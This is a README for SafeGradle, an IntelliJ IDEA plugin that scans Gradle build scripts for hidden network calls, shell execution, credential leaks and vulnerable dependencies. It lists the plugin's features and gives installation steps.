SafeGradle is a professional-grade security scanner for IntelliJ IDEA that protects your development environment from malicious Gradle build scripts. It identifies security risks like hidden network calls, shell execution, and credential leaks before they can compromise your system.
- Semantic PSI Analysis: High-precision scanning using IntelliJ's Program Structure Interface (PSI) to detect obfuscated or dynamically constructed malicious code in both Kotlin (
.kts) and Groovy scripts. - Pre-opening Security: Integrated "Open in SafeGradle" actions on the Welcome Screen and "Trust Project" dialogs allow you to audit open-source projects before fully loading them.
- Software Composition Analysis (SCA): Automatically detects dependencies with known vulnerabilities (CVEs) to prevent supply chain attacks.
- Team-Wide Configuration: Share security policies across your team using a
.safegradle.ymlfile in your project root. - Real-time Protection: Editor annotations, gutter icons, and Alt+Enter quick-fixes provide immediate feedback as you edit build scripts.
- Incremental Scanning: Intelligent caching ensures scans are lightning-fast, only re-checking files when they change.
Keep your IDE secure and code with confidence.
-
Using the IDE built-in plugin system:
Settings/Preferences > Plugins > Marketplace > Search for "SafeGradle" > Install
-
Using JetBrains Marketplace:
Go to JetBrains Marketplace and install it by clicking the Install to ... button in case your IDE is running.
You can also download the latest release from JetBrains Marketplace and install it manually using Settings/Preferences > Plugins > ⚙️ > Install plugin from disk...
-
Manually:
Download the latest release and install it manually using Settings/Preferences > Plugins > ⚙️ > Install plugin from disk...
Plugin based on the IntelliJ Platform Plugin Template.